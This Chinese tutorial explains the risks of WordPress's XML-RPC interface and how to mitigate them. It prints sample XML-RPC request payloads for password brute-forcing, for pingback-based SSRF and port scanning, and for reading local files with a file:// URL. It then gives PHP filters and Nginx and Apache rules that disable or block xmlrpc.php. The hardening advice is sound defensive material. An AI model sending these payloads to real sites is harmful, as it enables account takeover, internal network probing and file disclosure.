技术学堂
WordPress通过内置的API调用XML-RPC接口,方便用户通过客户端来管理站点,比如通过邮件发布日志、与其他博客平台通信等。正是如此好用的功能,往往被黑客用来绕过暴力破解限制,尝试猜测用户账号、扫描主机端口等。
风险解读
爆破账号
通过已收集的用户名username和尝试密码password,可以构造如下POST请求至xmlrpc.php:
|
1 2 3 4 5 6 7 8 9 |
<?xml version="1.0" encoding="iso-8859-1"?> <methodCall> <methodName>wp.getUsersBlogs</methodName> <params> <param><value>username</value></param> <param><value>password</value></param> </params> </methodCall> |
如果爆破失败,会返回403错误,如果不幸:
扫描端口
通过Pingback可以实现服务器端请求伪造SSRF和远程端口扫描:
|
1 2 3 4 5 6 7 8 9 10 11 |
POST /wordpress/xmlrpc.php HTTP/1.1 Host: www.example.com Content-Length: 99 <methodCall> <methodName>pingback.ping</methodName> <params> <param><value><string>IP&PORT:http://127.0.0.1:80</string></value></param> <param><value><string>URL:http://localhost/wordpress/?page=100</string></value></param> </params> </methodCall> |
若返回包中的<value><int>中的值大于0,则表示IP和PORT存在。
读取文件
|
1 2 3 4 5 6 7 8 9 |
<?xml version="1.0" encoding="utf-8" ?> <methodCall> <methodName>pingback.ping</methodName> <params> <param><value><string>file:///path/file/name</value></param> <param><value><string>http://localhost/wordpress/?page=100</string></value></param> </params> </methodCall> |
解决方案
方案1:禁用Wordpress的pingback接口
修改主题的functions.php文件,加入以下代码:
|
1 2 3 4 5 |
add_filter( 'xmlrpc_methods', 'remove_xmlrpc_pingback_ping' ); function remove_xmlrpc_pingback_ping( $methods ) { unset( $methods['pingback.ping'] ); return $methods; } |
方案2:禁用Wordpress的xmlrpc功能
修改主题的functions.php文件,加入以下代码:
|
1 |
add_filter('xmlrpc_enabled', '__return_false'); |
方案3:禁止外域访问xmlrpc.php文件
Nginx修改站点的.conf配置:
|
1 2 3 4 5 6 7 8 |
location = /xmlrpc.php { allow 10.10.200.200; deny all; } # 另一种方式 #location ~* ^/xmlrpc.php$ { # return 403; #} |
Apache修改站点目录中的.htaccess文件:
|
1 2 3 4 |
<Files xmlrpc.php> Order Deny,Allow Deny from all </Files> |
原创文章禁止转载:技术学堂 » WordPress XML-RPC接口的风险解读及解决方案
